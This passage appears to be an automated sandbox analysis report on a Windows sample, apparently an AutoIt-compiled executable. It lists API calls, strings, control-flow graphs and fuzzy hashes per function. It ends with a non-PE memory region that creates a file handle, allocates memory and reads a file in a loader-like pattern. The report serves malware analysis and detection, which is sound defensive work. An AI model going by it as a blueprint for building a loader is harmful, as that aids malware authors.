                        • Instruction ID: a3c28b5b15a01c791280222b21edfa5fd349a1956df03e86cc24d857c66d3143
                        • Opcode Fuzzy Hash: 306ce0a178b8bfad8bbdc37a215a00fd35a7f666442059b4ec7009bb8e7bdd6e
                        • Instruction Fuzzy Hash: 50118131208345AAC717FF60D8D2ABFB7A89B91351F44942DF1865B0B2CF759A49C712
                        Function 0039DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlenW.KERNEL32(?,00375222), ref: 0039DBCE
                        • GetFileAttributesW.KERNELBASE(?), ref: 0039DBDD
                        • FindFirstFileW.KERNELBASE(?,?), ref: 0039DBEE
                        • FindClose.KERNEL32(00000000), ref: 0039DBFA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FileFind$AttributesCloseFirstlstrlen
                        • String ID:
                        • API String ID: 2695905019-0
                        • Opcode ID: 38ae7f8485859a12ff871625180a61c1c8502668702c6c87eccabd0f816d2e6a
                        • Instruction ID: 5b66ef17c9aa3a1d7ebeb23661e918b28b261a40e82eddf5222d95b36d712c03
                        • Opcode Fuzzy Hash: 38ae7f8485859a12ff871625180a61c1c8502668702c6c87eccabd0f816d2e6a
                        • Instruction Fuzzy Hash: 9BF0A03082091057CA226B78EC0E8AA776C9E01334F144B02F83AC20E0EBB069558A95
                        Function 0033BF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: BuffCharUpper
                        • String ID: p#@
                        • API String ID: 3964851224-1673889715
                        • Opcode ID: 43f1f6b2d09712b7ff1838f11bb49185985fe9d336ea054fb6624606396f8fe3
                        • Instruction ID: 1fafbfc7ce4f8d816448757dc00fd0adf153c54e1969fb25d0886eae310f89fb
                        • Opcode Fuzzy Hash: 43f1f6b2d09712b7ff1838f11bb49185985fe9d336ea054fb6624606396f8fe3
                        • Instruction Fuzzy Hash: 54A279706083418FC756DF28C4C0B2ABBE5BF89304F15996DE89A9B352D771EC45CB92
                        Function 0033D730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetInputState.USER32 ref: 0033D807
                        • timeGetTime.WINMM ref: 0033DA07
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0033DB28
                        • TranslateMessage.USER32(?), ref: 0033DB7B
                        • DispatchMessageW.USER32(?), ref: 0033DB89
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0033DB9F
                        • Sleep.KERNEL32(0000000A), ref: 0033DBB1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                        • String ID:
                        • API String ID: 2189390790-0
                        • Opcode ID: bb7561570c5421535305e45f42290f16dca6c6cbc0152e0b7e5c0fa3115041b6
                        • Instruction ID: 79df7216a669ff6a6eb20735f1b3d2cec8a6e5b36a757ccad92f430fbb3ecb02
                        • Opcode Fuzzy Hash: bb7561570c5421535305e45f42290f16dca6c6cbc0152e0b7e5c0fa3115041b6
                        • Instruction Fuzzy Hash: D942D070608341EFD72BDF24D884FAAB7E5BF86304F1585A9F4568B2A1D770E844CB92
                        Function 00332CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 00332D07
                        • RegisterClassExW.USER32(00000030), ref: 00332D31
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00332D42
                        • InitCommonControlsEx.COMCTL32(?), ref: 00332D5F
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00332D6F
                        • LoadIconW.USER32(000000A9), ref: 00332D85
                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00332D94
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                        • API String ID: 2914291525-1005189915
                        • Opcode ID: 9b1c91bce20f481df113200419c43a87cae09849ee436dd80feb8d800f655328
                        • Instruction ID: abee9cb7ef13f2bde5fce441c5f821bba2b0dc48bf862b4628ddfd8a34d079ad
                        • Opcode Fuzzy Hash: 9b1c91bce20f481df113200419c43a87cae09849ee436dd80feb8d800f655328
                        • Instruction Fuzzy Hash: EA21A0B5911218AFDB019FA4E949B9DBBB8FB08700F00512AEA15F62A0D7B15544CF95
                        Function 00368D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 302 368d45-368d55 303 368d57-368d6a call 35f2c6 call 35f2d9 302->303 304 368d6f-368d71 302->304 320 3690f1 303->320 306 368d77-368d7d 304->306 307 3690d9-3690e6 call 35f2c6 call 35f2d9 304->307 306->307 310 368d83-368dae 306->310 325 3690ec call 3627ec 307->325 310->307 313 368db4-368dbd 310->313 316 368dd7-368dd9 313->316 317 368dbf-368dd2 call 35f2c6 call 35f2d9 313->317 318 3690d5-3690d7 316->318 319 368ddf-368de3 316->319 317->325 324 3690f4-3690f9 318->324 319->318 323 368de9-368ded 319->323 320->324 323->317 327 368def-368e06 323->327 325->320 331 368e23-368e2c 327->331 332 368e08-368e0b 327->332 335 368e2e-368e45 call 35f2c6 call 35f2d9 call 3627ec 331->335 336 368e4a-368e54 331->336 333 368e15-368e1e 332->333 334 368e0d-368e13 332->334 339 368ebf-368ed9 333->339 334->333 334->335 364 36900c 335->364 337 368e56-368e58 336->337 338 368e5b-368e79 call 363820 call 3629c8 * 2 336->338 337->338 372 368e96-368ebc call 369424 338->372 373 368e7b-368e91 call 35f2d9 call 35f2c6 338->373 341 368edf-368eef 339->341 342 368fad-368fb6 call 36f89b 339->342 341->342 345 368ef5-368ef7 341->345 355 368fb8-368fca 342->355 356 369029 342->356 345->342 349 368efd-368f23 345->349 349->342 353 368f29-368f3c 349->353 353->342 358 368f3e-368f40 353->358 355->356 361 368fcc-368fdb GetConsoleMode 355->361 360 36902d-369045 ReadFile 356->360 358->342 365 368f42-368f6d 358->365 367 369047-36904d 360->367 368 3690a1-3690ac GetLastError 360->368 361->356 363 368fdd-368fe1 361->363 363->360 369 368fe3-368ffd ReadConsoleW 363->369 370 36900f-369019 call 3629c8 364->370 365->342 371 368f6f-368f82 365->371 367->368 376 36904f 367->376 374 3690c5-3690c8 368->374 375 3690ae-3690c0 call 35f2d9 call 35f2c6 368->375 377 36901e-369027 369->377 378 368fff GetLastError 369->378 370->324 371->342 382 368f84-368f86 371->382 372->339 373->364 379 369005-36900b call 35f2a3 374->379 380 3690ce-3690d0 374->380 375->364 386 369052-369064 376->386 377->386 378->379 379->364 380->370 382->342 391 368f88-368fa8 382->391 386->370 388 369066-36906a 386->388 395 369083-36908e 388->395 396 36906c-36907c call 368a61 388->396 391->342 401 369090 call 368bb1 395->401 402 36909a-36909f call 3688a1 395->402 407 36907f-369081 396->407 408 369095-369098 401->408 402->408 407->370 408->407
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: .5
                        • API String ID: 0-4279605997
                        • Opcode ID: 6e74fb9ef035ad728cab610ef64f8ca428c56f403ef154eba81718253c84b15a
                        • Instruction ID: d5c903947fd9e1a93b36358c201cc5ba80de059ce4d2226aa7d400276af59efd
                        • Opcode Fuzzy Hash: 6e74fb9ef035ad728cab610ef64f8ca428c56f403ef154eba81718253c84b15a
                        • Instruction Fuzzy Hash: A3C1F674D04249AFCF13DFA8D841BADBBB8AF0D310F05815AF815AB396CB719941CB61
                        Function 0037065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 410 37065b-37068b call 37042f 413 3706a6-3706b2 call 365221 410->413 414 37068d-370698 call 35f2c6 410->414 419 3706b4-3706c9 call 35f2c6 call 35f2d9 413->419 420 3706cb-370714 call 37039a 413->420 421 37069a-3706a1 call 35f2d9 414->421 419->421 429 370716-37071f 420->429 430 370781-37078a GetFileType 420->430 431 37097d-370983 421->431 435 370756-37077c GetLastError call 35f2a3 429->435 436 370721-370725 429->436 432 3707d3-3707d6 430->432 433 37078c-3707bd GetLastError call 35f2a3 CloseHandle 430->433 439 3707df-3707e5 432->439 440 3707d8-3707dd 432->440 433->421 447 3707c3-3707ce call 35f2d9 433->447 435->421 436->435 441 370727-370754 call 37039a 436->441 444 3707e9-370837 call 36516a 439->444 445 3707e7 439->445 440->444 441->430 441->435 452 370847-37086b call 37014d 444->452 453 370839-370845 call 3705ab 444->453 445->444 447->421 460 37087e-3708c1 452->460 461 37086d 452->461 453->452 459 37086f-370879 call 3686ae 453->459 459->431 463 3708c3-3708c7 460->463 464 3708e2-3708f0 460->464 461->459 463->464 466 3708c9-3708dd 463->466 467 3708f6-3708fa 464->467 468 37097b 464->468 466->464 467->468 469 3708fc-37092f CloseHandle call 37039a 467->469 468->431 472 370963-370977 469->472 473 370931-37095d GetLastError call 35f2a3 call 365333 469->473 472->468 473->472
                        APIs
                          • Part of subcall function 0037039A: CreateFileW.KERNELBASE(00000000,00000000,?,00370704,?,?,00000000,?,00370704,00000000,0000000C), ref: 003703B7
                        • GetLastError.KERNEL32 ref: 0037076F
                        • __dosmaperr.LIBCMT ref: 00370776
                        • GetFileType.KERNELBASE(00000000), ref: 00370782
                        • GetLastError.KERNEL32 ref: 0037078C
                        • __dosmaperr.LIBCMT ref: 00370795
                        • CloseHandle.KERNEL32(00000000), ref: 003707B5
                        • CloseHandle.KERNEL32(?), ref: 003708FF
                        • GetLastError.KERNEL32 ref: 00370931
                        • __dosmaperr.LIBCMT ref: 00370938
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                        • String ID: H
                        • API String ID: 4237864984-2852464175
                        • Opcode ID: 5fb936d258de9a6b3f5542c0cca5b1fd16188ee310c7dd3c48718334ec422252
                        • Instruction ID: 8d460e997890fe5fb00a014edb5e071f0603a0f68850b1f0421615b5a415ce36
                        • Opcode Fuzzy Hash: 5fb936d258de9a6b3f5542c0cca5b1fd16188ee310c7dd3c48718334ec422252
                        • Instruction Fuzzy Hash: 8DA12836A101448FDF2E9F68D851BAD7BA0EB06320F14815DF859EF2A1CB399812CB91
                        Function 0033344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00333A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00401418,?,00332E7F,?,?,?,00000000), ref: 00333A78
                          • Part of subcall function 00333357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00333379
                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0033356A
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0037318D
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003731CE
                        • RegCloseKey.ADVAPI32(?), ref: 00373210
                        • _wcslen.LIBCMT ref: 00373277
                        • _wcslen.LIBCMT ref: 00373286
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                        • API String ID: 98802146-2727554177
                        • Opcode ID: b448091ac89118901e06cc4a0f58b102801b555fa50f705abf7eaaf5aba5e0e3
                        • Instruction ID: bad5da69b8f479994890d527d9a5898e3148165fe41895205e224268a54c6774
                        • Opcode Fuzzy Hash: b448091ac89118901e06cc4a0f58b102801b555fa50f705abf7eaaf5aba5e0e3
                        • Instruction Fuzzy Hash: DF7191714043009EC316EF65DE8599BB7E8FF85340F40583EF949EB1A1DBB49A48CB55
                        Function 00332B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 00332B8E
                        • LoadCursorW.USER32(00000000,00007F00), ref: 00332B9D
                        • LoadIconW.USER32(00000063), ref: 00332BB3
                        • LoadIconW.USER32(000000A4), ref: 00332BC5
                        • LoadIconW.USER32(000000A2), ref: 00332BD7
                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00332BEF
                        • RegisterClassExW.USER32(?), ref: 00332C40
                          • Part of subcall function 00332CD4: GetSysColorBrush.USER32(0000000F), ref: 00332D07
                          • Part of subcall function 00332CD4: RegisterClassExW.USER32(00000030), ref: 00332D31
                          • Part of subcall function 00332CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00332D42
                          • Part of subcall function 00332CD4: InitCommonControlsEx.COMCTL32(?), ref: 00332D5F
                          • Part of subcall function 00332CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00332D6F
                          • Part of subcall function 00332CD4: LoadIconW.USER32(000000A9), ref: 00332D85
                          • Part of subcall function 00332CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00332D94
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                        • String ID: #$0$AutoIt v3
                        • API String ID: 423443420-4155596026
                        • Opcode ID: 8b8d22b40dbfe2a97e003a17c687f075f1123f33b039a7f10c735cf3c5cea658
                        • Instruction ID: 05f6c6458baa9414931b0625720bfe8fe44a216d83bb908bfe56fb9465286d96
                        • Opcode Fuzzy Hash: 8b8d22b40dbfe2a97e003a17c687f075f1123f33b039a7f10c735cf3c5cea658
                        • Instruction Fuzzy Hash: A9213974E10314AFEB119FA5EE85AA97FF8FB08B50F04002AF905B66B0D3B11540CF98
                        Function 0033B710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON
                        Download Yara Rule
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 0033BB4E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Init_thread_footer
                        • String ID: p#@$p#@$p#@$p#@$p%@$p%@$x#@$x#@
                        • API String ID: 1385522511-2640102361
                        • Opcode ID: 12eb64d87068e3388ec3a7a631d8dc52da5163f8a2814e66757fc3deecb85c8b
                        • Instruction ID: 30e1b6f4eced2aa9129bafaf2233c692c5d58276f8f57802418a457c671f0369
                        • Opcode Fuzzy Hash: 12eb64d87068e3388ec3a7a631d8dc52da5163f8a2814e66757fc3deecb85c8b
                        • Instruction Fuzzy Hash: 6132EF34A00209DFCB26DF64C9C8BBEB7B9EF44310F158099EE15AB291C7B4AD45CB50
                        Function 00333170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 758 333170-333185 759 333187-33318a 758->759 760 3331e5-3331e7 758->760 761 3331eb 759->761 762 33318c-333193 759->762 760->759 763 3331e9 760->763 767 3331f1-3331f6 761->767 768 372dfb-372e23 call 3318e2 call 34e499 761->768 764 333265-33326d PostQuitMessage 762->764 765 333199-33319e 762->765 766 3331d0-3331d8 DefWindowProcW 763->766 773 333219-33321b 764->773 770 3331a4-3331a8 765->770 771 372e7c-372e90 call 39bf30 765->771 772 3331de-3331e4 766->772 774 3331f8-3331fb 767->774 775 33321d-333244 SetTimer RegisterWindowMessageW 767->775 802 372e28-372e2f 768->802 777 3331ae-3331b3 770->777 778 372e68-372e77 call 39c161 770->778 771->773 796 372e96 771->796 773->772 781 333201-333214 KillTimer call 3330f2 call 333c50 774->781 782 372d9c-372d9f 774->782 775->773 779 333246-333251 CreatePopupMenu 775->779 785 372e4d-372e54 777->785 786 3331b9-3331be 777->786 778->773 779->773 781->773 788 372dd7-372df6 MoveWindow 782->788 789 372da1-372da5 782->789 785->766 799 372e5a-372e63 call 390ad7 785->799 794 333253-333263 call 33326f 786->794 795 3331c4-3331ca 786->795 788->773 797 372da7-372daa 789->797 798 372dc6-372dd2 SetFocus 789->798 794->773 795->766 795->802 796->766 797->795 803 372db0-372dc1 call 3318e2 797->803 798->773 799->766 802->766 807 372e35-372e48 call 3330f2 call 333837 802->807 803->773 807->766
                        APIs
                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0033316A,?,?), ref: 003331D8
                        • KillTimer.USER32(?,00000001,?,?,?,?,?,0033316A,?,?), ref: 00333204
                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00333227
                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0033316A,?,?), ref: 00333232
                        • CreatePopupMenu.USER32 ref: 00333246
                        • PostQuitMessage.USER32(00000000), ref: 00333267
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                        • String ID: TaskbarCreated
                        • API String ID: 129472671-2362178303
                        • Opcode ID: cbd4e07ec7b806d5a5acce998a7909713484a3fd9f33ab6ebdfa6289a0172597
                        • Instruction ID: 084f7b5e9ee499d318918bc307d2bd6096fa448185630a604c94b4f376a00c80
                        • Opcode Fuzzy Hash: cbd4e07ec7b806d5a5acce998a7909713484a3fd9f33ab6ebdfa6289a0172597
                        • Instruction Fuzzy Hash: 04412831A50200ABEB272B78DE8DB7A365DE705340F04C135F91AEA5F1C779DA40D769
                        Function 0033DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: D%@$D%@$D%@$D%@$D%@D%@$Variable must be of type 'Object'.
                        • API String ID: 0-3139565913
                        • Opcode ID: 3ee2721948c6c3443d8ee7cb663ec58b5786592f97101ca259e2597af18e5bdd
                        • Instruction ID: d7593252870f1e30f37c82007b4067dae0ad03437d1baf57de36024143c12fb1
                        • Opcode Fuzzy Hash: 3ee2721948c6c3443d8ee7cb663ec58b5786592f97101ca259e2597af18e5bdd
                        • Instruction Fuzzy Hash: C0C29875E00214CFCB26DFA8C8C0AADB7B1BF09710F258569E946AB3A1D375ED41CB91
                        Function 013825D0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1324 13825d0-138267e call 1380000 1327 1382685-13826ab call 13834e0 CreateFileW 1324->1327 1330 13826ad 1327->1330 1331 13826b2-13826c2 1327->1331 1332 13827fd-1382801 1330->1332 1336 13826c9-13826e3 VirtualAlloc 1331->1336 1337 13826c4 1331->1337 1333 1382843-1382846 1332->1333 1334 1382803-1382807 1332->1334 1338 1382849-1382850 1333->1338 1339 1382809-138280c 1334->1339 1340 1382813-1382817 1334->1340 1341 13826ea-1382701 ReadFile 1336->1341 1342 13826e5 1336->1342 1337->1332 1343 1382852-138285d 1338->1343 1344 13828a5-13828ba 1338->1344 1339->1340 1345 1382819-1382823 1340->1345 1346 1382827-138282b 1340->1346 1349 1382708-1382748 VirtualAlloc 1341->1349 1350 1382703 1341->1350 1342->1332 1351 138285f 1343->1351 1352 1382861-138286d 1343->1352 1353 13828ca-13828d2 1344->1353 1354 13828bc-13828c7 VirtualFree 1344->1354 1345->1346 1347 138283b 1346->1347 1348 138282d-1382837 1346->1348 1347->1333 1348->1347 1355 138274a 1349->1355 1356 138274f-138276a call 1383730 1349->1356 1350->1332 1351->1344 1357 138286f-138287f 1352->1357 1358 1382881-138288d 1352->1358 1354->1353 1355->1332 1364 1382775-138277f 1356->1364 1360 13828a3 1357->1360 1361 138289a-13828a0 1358->1361 1362 138288f-1382898 1358->1362 1360->1338 1361->1360 1362->1360 1365 1382781-13827b0 call 1383730 1364->1365 1366 13827b2-13827c6 call 1383540 1364->1366 1365->1364 1371 13827c8 1366->1371 1372 13827ca-13827ce 1366->1372 1371->1332 1374 13827da-13827de 1372->1374 1375 13827d0-13827d4 FindCloseChangeNotification 1372->1375 1376 13827ee-13827f7 1374->1376 1377 13827e0-13827eb VirtualFree 1374->1377 1375->1374 1376->1327 1376->1332 1377->1376
                        APIs
                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 013826A1
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 013828C7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189780107.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1380000_Copy of 01.jbxd
                        Similarity
                        • API ID: CreateFileFreeVirtual
                        • String ID:
                        • API String ID: 204039940-0
                        • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                        • Instruction ID: b4f93f80d1080d7e7d6ec5032bfd810d6c3ac6fdc3003aa23a79ae37666bf045
                        • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
